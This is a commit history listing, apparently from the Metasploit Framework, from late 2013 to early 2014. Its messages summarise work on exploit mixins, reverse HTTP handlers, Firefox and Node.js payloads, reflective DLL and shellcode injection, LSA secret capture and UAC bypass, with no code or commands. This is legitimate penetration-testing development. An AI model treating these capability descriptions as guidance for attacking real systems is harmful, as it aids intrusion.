Commit Graph

4136 Commits (55aa32c6b634a03f76ab7f002c273027720e4155)

Author SHA1 Message Date
Meatballs 398e8463b1
Add more informative errors 2014-01-23 23:19:00 +00:00
Tod Beardsley b5f61024c5
Land #2907, fixes qual asset importer
Addresses MSP-9311
2014-01-23 13:32:22 -06:00
jvazquez-r7 256f2b12eb
Land #2894, @wchen-r7's CheckCode documentation update 2014-01-23 07:31:24 -06:00
lsanchez-r7 58cf7193f9 fixing NameError undefined local variable in an import 2014-01-22 16:54:31 -06:00
Meatballs 9acd0f4b56
Merge remote-tracking branch 'upstream/master' into enum_ad_perf 2014-01-22 21:46:50 +00:00
Tod Beardsley 90207628cc
Land #2666, SSLCompression option
[SeeRM #823], where Stephen was asking for SSL compression for
Meterpreter -- this isn't that, but it's at least now possible for other
Metasploit functionality.
2014-01-22 10:42:13 -06:00
Meatballs 80452767c8
Comments 2014-01-22 10:24:24 +00:00
Meatballs 156e3c046e
Dont lookup twice 2014-01-22 10:14:56 +00:00
Meatballs 6d6d1e1033
No need to fiddle with naming context 2014-01-22 10:06:36 +00:00
Tod Beardsley 0b6e03df75
More comment docs on SSLCompression 2014-01-21 16:48:26 -06:00
Tod Beardsley b8219e3e91
Warn the user about SSLCompression 2014-01-21 16:41:45 -06:00
Meatballs 720f892e2f
Merge remote-tracking branch 'upstream/master' into enum_ad_perf 2014-01-21 21:00:51 +00:00
sinn3r ea47da5682 Add wiki link "How to write a check() method" to documentation 2014-01-20 20:10:50 -06:00
sinn3r e48b8ae14c Use a better term 2014-01-19 16:01:38 -06:00
sinn3r afd0e71457 Use the term "exploit" is a little more correctly
So Metasploit uses the term "exploit" to describe something, a module
or an action, that results popping a shell. A check normally doesn't
pop a shell, so avoid that language.
2014-01-17 13:50:23 -06:00
sinn3r 363c53e14e Clearify when to use a specific CheckCode
An example of the biggest confusion module developers face is not
actually knowing the difference between Detected vs Appears vs
Vulnerable. For example: a module might flag something as a
vulnerable by simply doing a banner check, but this is often
unreliable because either 1) that banner can be fooled, or 2)
the patch does not actually update the banner. More reasons may
apply. Just because the banner LOOKS vulnearble doesn't mean it is.
2014-01-17 13:35:17 -06:00
HD Moore 68ccdc8386 Fix a stack trace when module_payloads.rb is run
This fixes a missing check for self.target being nil in the compatible_payloads method
2014-01-13 15:36:33 -08:00
William Vu 4ccf1a4720
Land #2873, Msf::Handler::ReverseHttp::UriChecksum 2014-01-13 15:38:56 -06:00
David Maloney 41807d7e4e move rev_http uri checksum code
need access to the uri checksum
routines outside of the handler.
moved them to their own mixin
and then mixed into the handler.
added specs also
2014-01-13 15:18:16 -06:00
Tod Beardsley e6e6d7aae4
Land #2868, fix Firefox mixin requires 2014-01-13 14:23:51 -06:00
Joe Vennix 3db143c452 Remove explicit requires for FF payload.
Adds ff payload require to msf/core/payload.rb
2014-01-13 13:07:55 -06:00
jvazquez-r7 95a5d12345 Merge #2835, #2836, #2837, #2838, #2839, #2840, #2841, #2842 into one branch 2014-01-13 10:57:09 -06:00
sinn3r cacd7ff9d4
Land #2827 - Add firefox js xpcom payloads for universal ff shells 2014-01-10 14:29:32 -06:00
Joe Vennix 7af8fe9cd1 Catch exceptions in an XSS script and return the error. 2014-01-07 16:23:24 -06:00
Joe Vennix fb1a038024 Update async API to actually be async in all cases.
This avoids zalgo. Also optionally checks the return value
of the compiled Function in XSS to allow you to use send()
or an explicit return, which is maybe more natural for
synchronous xss payloads.
2014-01-07 16:17:34 -06:00
Niel Nielsen 73e359ede1 Update reverse_tcp.rb
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:06:11 +01:00
Niel Nielsen e3a3b560e2 Update bind_tcp.rb
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:02:52 +01:00
Meatballs 3bf728da61
Dont store in DB by default 2014-01-07 12:20:44 +00:00
Joe Vennix 9d3b86ecf4 Add explicit require for JSON, so msfpayload runs. 2014-01-05 14:58:18 -06:00
Joe Vennix d00acccd4f Remove Java target, since it no longer works. 2014-01-04 21:22:47 -06:00
OJ 8898486820 Change display message to show actual bind address
When running a http/https listener the address:port that was being
shown in the output was that which was passed to the victim as part
of the stager and not the actual listener address:port.

This commit fixes this so that the display is correct.
2014-01-05 11:28:51 +10:00
Joe Vennix f2f68a61aa Use shell primitives instead of resorting to
echo hacks.
2014-01-04 19:00:36 -06:00
Raphael Mudge 6034c26fa7 Honor LPORT as callback port for HTTP/S handler
This commit completes our quest to (optionally) decouple the stage's
callback parameters from the interface/port our handler binds to.

LPORT is now patched into the stage over ReverseListenerBindPort.
2014-01-04 18:52:19 -05:00
Raphael Mudge 3c9d684759 Cleanup - Remove bind_address from reverse_http.rb
This commit removes the now unused bind_address function from
reverse_http.rb. This function returns an array of hosts the handler
should attempt to bind to (e.g., [LHOST value, any])

Other handlers (e.g., reverse_tcp.rb) loop through these values until
they're able to start a server with that bind address.

The HTTP server doesn't work this way. It's setup to try one address
and that's it. It makes sense to have the HTTP server always bind to
0.0.0.0 by default as future modules run by the user may register
resources with the same HTTP server.
2014-01-04 16:02:32 -05:00
Raphael Mudge 6f55579acd HTTP Handler Bind to 0.0.0.0 or ReverseListenerBindAddress
This commit returns the HTTP/S handler to its former semantic glory.
By default the HTTP/S handler will bind to :: or 0.0.0.0. If the
user specifies a ReverseListenerBindAddress then, instead, the
server will bind to that address.

The previous commit to change the URL to always reference LHOST
should go with this too. LHOST is always my intent of where the
stage should call home too. ReverseListenerBindAddress would make
sense as my intent as to where I want to bind to. The two options
shouldn't take on each other's meanings.
2014-01-04 15:50:06 -05:00
Raphael Mudge f93210ca74 Always Use LHOST for Full URL in HTTP/S Stage
Redmine #8726 documents a change where the reverse HTTP/S
tries to bind LHOST and if it can not it does a hard stop

If it's expected that users will use ReverseListenerBind-
-Address then this commit addresses #8726 by patching the
HTTP/S stage with the host provided by the user in LHOST.

Currently ReverseListenerBindAddress (if used) is patched
into the stage. This makes for a broken HTTP/S session if
the user sets this option to 0.0.0.0.

With this commit--users can provide any LHOST they like
and set ReverseListenerBindAddress to 0.0.0.0 and things
will work.

This commit does not attempt to bring the HTTP/S handler
back to the old behavior of falling back to 0.0.0.0 when
it can't bind LHOST. I'd welcome the old behavior but I
leave it to you to decide what makes sense. :)
2014-01-04 15:16:22 -05:00
Joe Vennix b9c46cde47 Refactor runCmd, allow js exec.
* Updates exec payload to not touch disk
* Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options)
2014-01-04 08:46:57 -06:00
Joe Vennix 60991b08eb Whitespace tweak. 2014-01-03 18:40:31 -06:00
Joe Vennix a5ebdce262 Add exec payload. Cleans up a lot of code.
Adds some yardocs and whatnot.
2014-01-03 18:23:48 -06:00
Joe Vennix 8fd517f9ef Fixes shell escaping errors with nested quotes in windows. 2014-01-03 16:14:28 -06:00
Joe Vennix 13464d0aae Minor cleanup of firefox.rb. 2014-01-03 01:34:57 -06:00
Joe Vennix 7961b3eecd Rework windows shell to use wscript. 2014-01-03 01:29:34 -06:00
Meatballs 5606958320
Resolve require order 2014-01-02 23:46:18 +00:00
jvazquez-r7 f5f18965b9 Move the require to the payloads as ruby and nodejs payloads do 2014-01-02 16:05:03 -06:00
jvazquez-r7 764d0822f6 Use the current msf's naming convention 2014-01-02 15:57:09 -06:00
Joe Vennix 06fb2139b0 Digging around to get shell_command_token to work. 2014-01-02 14:05:06 -06:00
Joe Vennix 8d3130b19e Reorder targets. 2014-01-02 10:48:28 -06:00
Joe Vennix 9b39ea55ee Fix comment.{ 2014-01-02 10:48:28 -06:00
Joe Vennix 1f9ac12dda DRYs up firefox payloads. 2014-01-02 10:48:28 -06:00
Joe Vennix 694cb11025 Add firefox platform, architecture, and payload.
* Enables chrome privilege exploits in firefox to run a javascript cmd
shell session without touching the disk.
* Adds a spec for the addon_generator.
2014-01-02 10:48:28 -06:00
jvazquez-r7 0725b9c69c Refactor JSP payloads 2013-12-31 08:27:37 -06:00
Samuel Huckins 985af3adfe Update to masked credential format
* To support change in Pro export format. Previous format looked
like an XML element, for no reason, failed validation.
2013-12-30 10:59:15 -06:00
jvazquez-r7 39844e90c3 Don't user merge! because can modify self.compat 2013-12-27 16:37:34 -06:00
sinn3r 9c484dd0a3
Land #2786 - HP SiteScope issueSiebelCmd Remote Code Execution 2013-12-23 02:34:01 -06:00
jvazquez-r7 ed838d73a6 Allow targets to specify Compat[ible] payloads 2013-12-19 17:48:15 -06:00
Joe Vennix ca23b32161 Add support for Procs in browserexploit requirements. 2013-12-19 12:49:05 -06:00
Meatballs 62ef810e7c
Use Extapi if available 2013-12-19 18:18:47 +00:00
Meatballs 737154c2fe
Update to use extapi 2013-12-19 16:46:09 +00:00
Meatballs 3ef1c0ecd6 Merge remote-tracking branch 'upstream/master' into enum_ad_perf 2013-12-19 14:25:07 +00:00
Meatballs 6e43edff4c
Merge in extapi post mixin 2013-12-19 14:25:02 +00:00
Meatballs 244cf3b3f6 Merge remote-tracking branch 'upstream/pr/2736' into enum_ad_perf 2013-12-19 13:59:57 +00:00
Joe Vennix cb390bee7d Move comment. 2013-12-18 20:37:33 -06:00
Joe Vennix f411313505 Tidy whitespace. 2013-12-18 20:31:31 -06:00
Joe Vennix 9ff82b5422 Move datastore options to mixin. 2013-12-18 14:52:41 -06:00
Joe Vennix 64273fe41d Move addon datastore options into mixin. 2013-12-18 14:42:01 -06:00
Joe Vennix 1235615f5f Add firefox 15 chrome privilege exploit.
* Moves the logic for generating a firefox addon into its own mixin
* Updates the firefox_xpi_bootstrapped_addon module to use the mixin
* Module only works if you move your mouse 1px in any direction.
2013-12-18 14:30:35 -06:00
Meatballs 3e54379b0e
Merge remote-tracking branch 'upstream/master' into wmic_post
Conflicts:
	lib/msf/core/post/windows.rb
2013-12-18 13:40:54 +00:00
Meatballs 687cbe5f60
Shadowcopy should use common wmic command
Small fix to ensure output is retrieved (args -> nil)
Modify shadowcopy to use wmic_query
2013-12-18 13:34:50 +00:00
William Vu 252909a609
Land #2448, @OJ's ReverseListenerBindPort :) 2013-12-17 11:24:09 -06:00
Meatballs 6ee1a9c6e1
Fix duplicate error 2013-12-17 00:11:37 +00:00
Meatballs 06b399ee30
Remove ERROR_
To access as Error::NO_ACCESS
2013-12-16 19:52:11 +00:00
Meatballs 08a44fdfb7
Filename match module 2013-12-16 19:48:17 +00:00
Meatballs 57f2027e51
Move to module 2013-12-16 19:45:52 +00:00
Meatballs c9084bd2d5
Remove errant fullstops 2013-12-16 18:53:37 +00:00
Meatballs 75c87faaf8
Add Windows Error Codes to Windows Post Mixin 2013-12-16 18:50:18 +00:00
Meatballs 435cc9b93f
Add single quote encapsulation
For WMI and psh_web_delivery
2013-12-16 15:13:13 +00:00
Meatballs b252e7873b
Merge remote-tracking branch 'upstream/master' into pr2075 2013-12-16 14:29:05 +00:00
Meatballs 819ba30a33 msftidy
Conflicts:
	lib/msf/core/post/windows/services.rb
2013-12-15 01:12:46 +00:00
Meatballs a930056d7f Added service status checks to Post::Windows::Services
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module

Conflicts:
	lib/msf/core/post/windows/services.rb
	lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
2013-12-15 01:12:45 +00:00
Meatballs 284a45a6c5
Convert UTF16 to ASCII 2013-12-14 22:58:16 +00:00
Meatballs e46b5c9d55
Revert to file io if no EXTAPI 2013-12-14 22:46:22 +00:00
Meatballs ca5ee7e156
Load extapi before wmic 2013-12-14 22:45:56 +00:00
Meatballs b532987b8f
Re-add file out to wmic_command 2013-12-14 20:58:33 +00:00
Meatballs 8d5f298d3d
Clear clipboard first 2013-12-14 20:26:46 +00:00
Meatballs 7902f061ca
Final tidyup 2013-12-14 20:18:14 +00:00
Meatballs 04496a539c
Fix up local wmi exploit. 2013-12-14 20:05:51 +00:00
Meatballs 4224c016f4
Use WaitForSingleObject instead of loop 2013-12-14 18:42:31 +00:00
Meatballs 12afdd2cbb
Get and parse result from clipboard 2013-12-14 18:30:43 +00:00
Meatballs 3ad1e57f8d
Merge remote-tracking branch 'upstream/master' into wmic_post 2013-12-14 16:25:31 +00:00
jvazquez-r7 83e448f4ae Restore vprint_error message 2013-12-12 09:06:29 -06:00
jvazquez-r7 5c1ca97e21 Create a new process to host the final payload 2013-12-12 08:26:44 -06:00
William Vu ff9cb481fb Land #2464, fixes for llmnr_response and friends
Fixed conflict in lib/msf/core/exploit/http/server.rb.
2013-12-10 13:41:45 -06:00
scriptjunkie 77e9996501
Mitigate metasm relocation error by disabling ASLR
Deal with import error by actually using the GetProcAddress code.
2013-12-07 20:54:13 -06:00
scriptjunkie 8d33138489 Support silent shellcode injection into DLLs
Only run code on DLL_PROCESS_ATTACH, preventing infinite loop otherwise:
Added code would create thread -> calls DLL entry point -> calling added code...
2013-12-07 19:44:17 -06:00
Meatballs 3aebe968bb
Land #2721 Reflective DLL Mixin
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.

Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
2013-12-06 12:26:51 +00:00
OJ 155836ddf9 Adjusted style as per egypt's points 2013-12-06 10:08:38 +10:00
OJ ccbf305de1 Remove exception stuff from the payloads 2013-12-06 09:26:46 +10:00
OJ 5a0a2217dc Add exception if DLL isn't RDI enabled 2013-12-06 09:18:08 +10:00
OJ 2cb991cace Shuffle RDI stuff into more appropriate structure
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
2013-12-06 08:25:24 +10:00
OJ fb84d7e7fe Update to yardoc conventions 2013-12-06 07:54:25 +10:00
sinn3r c7bb80c1d7 Add wvu as an author to author.rb 2013-12-05 00:33:07 -06:00
OJ b936831125 Renamed the mixin module 2013-12-05 08:13:54 +10:00
OJ 7b24f815ee Missed a single module in rename 2013-12-04 22:54:07 +10:00
OJ 7e8db8662e Update name of the mixin
Changed `RdiMixin` to `ReflectiveDLLInjection`.
2013-12-04 22:18:29 +10:00
OJ f79af4c30e Add RDI mixin module
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.

This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
2013-12-04 16:09:41 +10:00
yehualiu 8254c0bae2 this site is down 2013-12-01 14:26:03 +08:00
William Vu 77b036ce5d
Land #2703, uninit const fix for MSSQL_SQLI 2013-11-27 13:50:48 -06:00
jvazquez-r7 a5aca618e2 fix fail_with usage on Exploit::Remote::MSSQL_SQLI 2013-11-27 11:33:19 -06:00
jvazquez-r7 a32c9e5efc Fix fail_with on Exploit::Remote::HttpClient 2013-11-27 11:19:46 -06:00
sinn3r 5d10b44430 Add support for Silverlight
Add support for Silverlight exploitation. [SeeRM #8705]
2013-11-26 14:47:27 -06:00
Meatballs b015dd4f1c
Land #2532 Enum LSA Secrets
With refactoring of common methods from smart_hashdump, hashdump,
cachedump to Windows::Post::Privs
2013-11-24 18:09:33 +00:00
Meatballs a3c7dccfc0
Add disconnect option to psexec
Allow the module to prevent the mixin from ending the SMB session.
2013-11-24 16:37:25 +00:00
Meatballs dd9bb459bf
PSEXEC Refactor
Move peer into mixin
PSEXEC should use the psexec mixin
2013-11-24 16:24:05 +00:00
Meatballs c03c33f6f6
Initial commit 2013-11-24 14:58:18 +00:00
Meatballs e7dfda00db
Documentation 2013-11-23 22:03:43 +00:00
Meatballs becc521406
Constants, yey 2013-11-23 21:46:11 +00:00
Meatballs 699d13eef1
Share the wealth
Move LDAP methods to a Post mixin.
2013-11-23 21:42:09 +00:00
Meatballs 6c83109422
Really fix wmi 2013-11-23 16:44:44 +00:00
William Vu 8e23119e17
Land #2678, DB_ALL_CREDS should default to false 2013-11-22 23:42:00 -06:00
Tod Beardsley 8fc0a8199e DB_ALL_CREDS should be disabled by default
[SeeRM #8699]
2013-11-22 22:16:40 -06:00
Meatballs 259d5a2dba
Backout Set-Variable as it is 3.0 only 2013-11-23 01:15:13 +00:00
Meatballs 1c60373f68
Reinstate %COMSPEC% 2013-11-23 00:45:04 +00:00
Meatballs c194fdc67e
Fixup WMI
-c doesn't like $var assignments
2013-11-23 00:31:11 +00:00
Meatballs 3cbf768d16
Small size reductions 2013-11-22 22:58:42 +00:00
Meatballs 20b76602a1
Merge remote-tracking branch 'upstream/master' into pr2075
Conflicts:
	lib/msf/core/exploit/powershell.rb
2013-11-22 22:41:08 +00:00
Tod Beardsley e88da09894
Land #2660, DLL/service creation for x64 2013-11-20 17:25:16 -06:00
Joe Vennix 739c7b4ca2 More dead code and tweaks. 2013-11-20 14:44:53 -06:00
Joe Vennix 3ff9da5643 Remove compression options from client sockets.
I couldn't verify that it was working, as it always sends 1 compression type of NULL.
2013-11-20 14:41:45 -06:00
Meatballs 3ed84d1e0b
Remove puts 2013-11-20 20:29:54 +00:00
Meatballs 7253cc73d5
:payload_instance 2013-11-20 20:28:00 +00:00
Meatballs f27194a8ce
Always default to payload options 2013-11-20 20:14:59 +00:00
Meatballs 135dad1f4e
Fix dll/service creation 2013-11-20 20:10:47 +00:00
jvazquez-r7 110e78a1ad
Land #2507, @todb-r7's fix to allow DCERPC misin to use RPORT 2013-11-20 10:21:32 -06:00
Joe Vennix f8b57d45cd Reenable the client SSLCompression advanced option.
Add spec for some of the additions to Rex::Proto::Http::Client
2013-11-20 01:03:13 -06:00
Joe Vennix 109fc5a834 Add SSLCompression datastore option.
Also disables the compression by default. TLS-level compression is almost
never used by browsers, and openssl seems to be the only one that enables
it by default.

This also kills some ruby < 1.9.3 code.
2013-11-19 22:34:39 -06:00
Tod Beardsley ac1fb2d1da
Just use a straight RPORT, don't sneak 593.
Incidentally, the endmap scanner doesn't appear to work at all for
http-rpc-epmap, so no harm done anyway (tested against Windows 2008
server).

It looks like a bigger change than it realy is, thanks to the indentaton
changes by removing the itertor. Diff this without whitespace changes to
get a better idea of what's actually different.
2013-11-19 13:29:02 -06:00
jvazquez-r7 f690667294
Land #2617, @FireFart's mixin and login bruteforcer for TYPO3 2013-11-18 13:37:16 -06:00
James Lee 0aef145f64 Merge remote-tracking branch 'upstream/master' into land-2532-enum-lsa 2013-11-13 18:11:21 -06:00
James Lee 8471f74b75
Refactor ivar to a more reasonable method
Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
2013-11-13 18:09:41 -06:00
James Lee 16627c1bd3
Add spec for capture_lsa_key 2013-11-13 15:16:34 -06:00
William Vu 6bd82d8589
Land #2636, Win8 for {constants,platform}.rb 2013-11-13 14:20:52 -06:00
sinn3r 3a923422a3 Update class for Win 8 2013-11-13 13:27:44 -06:00
James Lee 3168359a82
Refactor lsa and add a spec for its crypto methods 2013-11-13 11:55:39 -06:00
Tod Beardsley 74df9bd037
Bump version number since 4.8.0 is out 2013-11-13 11:42:31 -06:00
sinn3r 8e90116c89 Add Win 8 to constants 2013-11-13 11:38:27 -06:00
jvazquez-r7 ef6d9db48f
Land #2613, @wchen-r7's BrowserExploitServer mixin 2013-11-12 17:33:12 -06:00
sinn3r fbe1b92c8f Good bye get_resource 2013-11-12 17:25:55 -06:00
Tod Beardsley 2035983d3c
Fix a handful of msftidy warnings, and XXX SSL
Marked the SSL stuff as something that needs to be resolved in order to
fix a future bug in datastore manipulation. Also, fixed some whitespace
and exec complaints

[SeeRM #8498]
2013-11-11 21:23:35 -06:00
sinn3r cf8f2940b0 Oops, this is the right filename 2013-11-11 15:45:11 -06:00
sinn3r 85150823cd rename again 2013-11-11 15:44:27 -06:00
sinn3r 6a840fc169 Move file to get a matching name 2013-11-11 12:41:03 -06:00
OJ 063da8a22e Update reverse_https_proxy stager/handler
This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00
sinn3r 866f240337 A little update on documentation 2013-11-07 17:06:43 -06:00
sinn3r 32b12609bd Forgot to pass optional headers 2013-11-07 16:50:58 -06:00
FireFart bdd33d4daf implement feedback from @jlee-r7 2013-11-07 23:07:58 +01:00
FireFart aab4d4ae76 first commit for typo3 2013-11-07 22:38:27 +01:00
sinn3r 991240a87e Support java version detection 2013-11-07 00:54:52 -06:00
sinn3r 3e1771aa77 Being able to pass binding when we need to 2013-11-07 00:12:29 -06:00
sinn3r 23996ec32c Fix up some things 2013-11-06 22:47:02 -06:00
sinn3r c338f7a8c0 Change how requirements are defined, rspec, etc 2013-11-06 14:01:29 -06:00
sinn3r c92116060e Forgot to rm this line 2013-11-06 01:53:46 -06:00
sinn3r f2e4d5507c More rspec 2013-11-06 01:45:40 -06:00
sinn3r 636adc81de Add rop_junk and rop_nop 2013-11-06 01:04:33 -06:00
sinn3r 65c96a1f45 Allow the module to be target specific 2013-11-06 00:57:53 -06:00
sinn3r 63d3c7e8bb Put proxy headers in a constant 2013-11-05 16:33:36 -06:00
sinn3r 73701462ed Fix ActiveX. Use ERB for Javascript detection code. 2013-11-05 16:26:41 -06:00
James Lee 36f96d343e Revert "Revert "Land #2505" to resolve new rspec fails"
This reverts commit e7d3206dc9.
2013-11-05 13:45:00 -06:00
sinn3r 9c6b187cc6 stuff 2013-11-05 11:05:33 -06:00
sinn3r 0513dad789 -_- 2013-11-05 10:30:37 -06:00
sinn3r 9d1742ac47 Fix typos 2013-11-05 10:15:53 -06:00
sinn3r 8fb2b943be Add ActiveX detection 2013-11-05 01:34:56 -06:00
sinn3r 5f2d8358c0 Be more browser specific with Javascript generation 2013-11-05 01:04:52 -06:00
sinn3r 844daf0e00 No regex for get_resource checking 2013-11-04 17:49:43 -06:00
sinn3r 054a525f35 Change profile data structure 2013-11-04 17:46:36 -06:00
sinn3r ef57a38274 Move documentation about profile structure 2013-11-04 16:47:15 -06:00
OJ 12810580d6 Remove arg for bind port/addr functions
Done to avoid masking of datastore instance variable.
2013-11-05 06:56:21 +10:00
sinn3r 9c8ecd2ede Fix encoding order 2013-11-04 14:06:42 -06:00
sinn3r d970925cbf Fix encoding bug 2013-11-04 13:45:29 -06:00
sinn3r 23e5a9f048 Force on_request_exploit override 2013-11-04 12:54:52 -06:00
sinn3r e83f4e5120 Use a warning 2013-11-04 12:54:41 -06:00
sinn3r 25787fbaa7 Change has_proxy? 2013-11-04 12:52:15 -06:00
sinn3r c6fb570480 Correct bad method naming 2013-11-04 12:35:04 -06:00
sinn3r 016e686bcf super chomp 2013-11-04 12:28:22 -06:00
sinn3r c3d9f4064c They are symbols not strings 2013-11-04 12:10:39 -06:00
sinn3r 0337e6ff54 Do yard documentation 2013-11-04 12:09:59 -06:00
sinn3r abc06aa8aa Use mutex 2013-11-01 11:35:23 -05:00
sinn3r 5fb261a974 Change var name 2013-10-31 23:48:41 -05:00
sinn3r d54c8a359b Fix bug in proxy detection 2013-10-31 23:42:43 -05:00
sinn3r 7a33c48a0f No double slash 2013-10-31 23:17:38 -05:00
sinn3r 5851d502b5 Rename some stuff 2013-10-31 23:12:20 -05:00
sinn3r 21891a8337 Make sure the browser can't retry by going to the first URL 2013-10-31 23:08:17 -05:00
sinn3r 94d62613ab Pretty much done with these, remove these comments. 2013-10-31 19:04:11 -05:00
sinn3r 828ef9c64c Adds target-specific payload generator 2013-10-31 18:54:01 -05:00
sinn3r 8a0ebcbac7 Adds method get_module_resource 2013-10-31 14:34:38 -05:00
sinn3r 10fd892827 Fix a "undefined method to_sym" bug
If something is undetectable, the value may be empty, which triggers
a undefined method error because the regex always assumes there is
something. So instead of +, we use *.
2013-10-31 14:06:05 -05:00
sinn3r 6e7e5a0ff9 Put postInfo() in the js directory 2013-10-31 13:55:22 -05:00
sinn3r 00efad5c5d Initial commit for BrowserExploitServer mixin 2013-10-31 13:17:06 -05:00
William Vu f5d1d8eace chmod -x .rb files without #! in modules and lib
It wasn't just cmdstager_printf.rb. :/
2013-10-30 19:51:25 -05:00
William Vu 333a0d5820 chmod -x cmdstager_printf.rb 2013-10-28 18:47:14 -05:00
b00stfr3ak a476595ddb Added require to post/windows 2013-10-25 14:42:22 -07:00
b00stfr3ak 84999115d7 Added PSH option if UAC is turned off
This will give the option to drop an exe or use psh if uac is turned
off.  The lib can be used for post exploitation to drop an exe or use
powershell and then execute it with the runas command.  I have used the
lib for both bypassuac and ask.
2013-10-25 14:37:12 -07:00
Tod Beardsley b5f26455a3
Land #2545, javascript library overhaul 2013-10-23 16:12:49 -05:00
sinn3r caf41f34bf
Land #2562 - Fix RM 8510 (FileDropper) 2013-10-22 21:45:33 -05:00
sinn3r acc73dd545
Land #2282 - BypassUAC now checks if the process is LowIntegrityLevel 2013-10-22 17:16:26 -05:00
jvazquez-r7 7d1dc3746f Use the @schierlm's command 2013-10-22 16:19:49 -05:00
Tod Beardsley dc0d9ae21d
Land #2560, ZDI references
[FixRM #8513]
2013-10-22 15:58:21 -05:00
Meatballs 8611a2a24c
Merge remote-tracking branch 'upstream/master' into low_integ_bypassuac 2013-10-22 21:42:36 +01:00
sinn3r ba1edc6fa8
Land #2402 - Windows Management Instrumentation Local -> Peers 2013-10-22 15:39:32 -05:00
jvazquez-r7 4ad9bc5efe Try to [FixRM #8510] 2013-10-22 08:42:14 -05:00
sinn3r afcce8a511 Merge osdetect and addonsdetect 2013-10-22 01:11:11 -05:00
sinn3r 99d5da1f03 We can simplify this 2013-10-21 20:22:45 -05:00
sinn3r 9a3e719233 Rework the naming style 2013-10-21 20:16:37 -05:00
Meatballs 4fc8bb2b4b
Auto arch detection 2013-10-22 00:42:59 +01:00
William Vu 9258d79978 Add ZDI references to reference.rb 2013-10-21 15:13:46 -05:00
sinn3r 032da9be10
Land #2426 - make use of Msf::Config.data_directory 2013-10-21 13:07:33 -05:00
Tod Beardsley e7d3206dc9
Revert "Land #2505" to resolve new rspec fails
This reverts commit 717dfefead, reversing
changes made to 6430fa3354.
2013-10-21 12:47:57 -05:00
William Vu 717dfefead
Land #2505, missing source fix for sock_sendpage 2013-10-21 11:47:55 -05:00
sinn3r 8a94df7dcd Change category name for base64 2013-10-18 21:20:16 -05:00
Tod Beardsley ffcb86eba2
Land #2541, Outpost24 importer
Sample data is currently secret. If we get a hold of non-secret sample
data, it'll be tacked on to the Redmine bug referenced below.

[FixRM #8384]
2013-10-18 13:21:58 -05:00
Meatballs 4e4d0488ae
Rubyfy constants in privs lib 2013-10-18 18:26:07 +01:00
sinn3r 6f04a5d4d7 Cache Javascript 2013-10-18 12:23:58 -05:00
sinn3r b0d614bc6a Cleaning up requires 2013-10-18 01:47:27 -05:00
Meatballs e450e34c7e
Merge branch 'master' of github.com:rapid7/metasploit-framework into low_integ_bypassuac
Conflicts:
	modules/exploits/windows/local/bypassuac.rb
2013-10-17 23:35:36 +01:00
Meatballs 5a662defac
Post::Privs uses Post::Registry methods 2013-10-17 23:28:07 +01:00
sinn3r c926fa710b Move all exploitation-related JavaScript to their new home 2013-10-17 16:43:29 -05:00
Rob Fuller 8f2ba68934 move decrypt_lsa and decrypt_secret to priv too 2013-10-17 00:04:21 -04:00
Rob Fuller 541d932d77 move decrypt_lsa to priv as well 2013-10-16 23:53:33 -04:00
Rob Fuller 60d8ee1434 move capture_lsa_key to priv 2013-10-16 23:45:28 -04:00
Rob Fuller 1a9fcf2cbb move convert_des_56_to_64 to priv 2013-10-16 23:39:07 -04:00
Rob Fuller 1a85bd22a8 move capture_boot_key to post win priv 2013-10-16 22:46:15 -04:00
sinn3r 4c91f2e0f5 Add detection code MS Office
Add detection code for MS Office XP, 2003, 2007, 2010, and 2012.

[SeeRM #8413]
2013-10-15 16:27:23 -05:00
William Vu 38965f91ee Add Outpost24 importer code to core/db.rb 2013-10-15 15:32:28 -05:00
James Lee 676f12e50e Import the new plaintext export format
Also:
* Import John the Ripper's plaintext from cracked NTLM hashes in the
  same way
* Don't choke on : in passwords when reading JtR's output
* Fix some whitespace
* Show a count of inactive creds if there are any instead of acting like
  they don't exist
2013-10-15 15:12:18 -05:00
William Vu 35dd94f0ac Land #2518, uninitialized JavascriptOSDetect fix 2013-10-14 13:32:04 -05:00
sinn3r e10dbf8a5d
Land #2508 - Add nodejs payloads 2013-10-14 12:23:31 -05:00
sinn3r da3081e1c8 [FixRM 8482] Fix uninit constant Rex::Exploitation::JavascriptOSDetect
This fixes an uninit constant Rex::Exploitation::JavascriptOSDetect
while using a module with js_os_detect. It was originally reported
by Metasploit user @viniciuskmax

[FixRM 8482]
2013-10-14 11:40:46 -05:00
James Lee 60f5567511 Output plaintext creds in a way john can use them 2013-10-13 13:36:03 -05:00
joev c7bcc97dff Add SSL support to #nodejs_reverse_tcp. 2013-10-12 03:32:52 -05:00
joev 6440a26f04 Move shared Node.js payload logic to mixin.
- this fixes the recursive loading issue when creating a payload
  inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
Tod Beardsley 4d76e8e9ac
Add RPORT to the list of DCERPC ports to check
[FixRM #8479]
2013-10-11 16:23:38 -05:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
Tod Beardsley 4f1e71e222
Also this isn't Lua. Deal with commas. 2013-10-09 17:30:57 -05:00
Tod Beardsley c8dc251042
Alphabetize authors
Because alphabetizing is cool and makes it easy for humans to find
things in long array lists quickly.

Also, I need to keep my lines changed count up.
2013-10-09 17:29:17 -05:00
James Lee 947925e3a3 Use a proper main signature with arguments
Allows us to `unlink(argv[0])`
2013-10-09 17:22:01 -05:00
Tod Beardsley 9d34a8c894
Land #2465, deal with missing cpuinfo bins
[FixRM #8456]

Thanks @ZeroChaos!
2013-10-09 13:03:48 -05:00
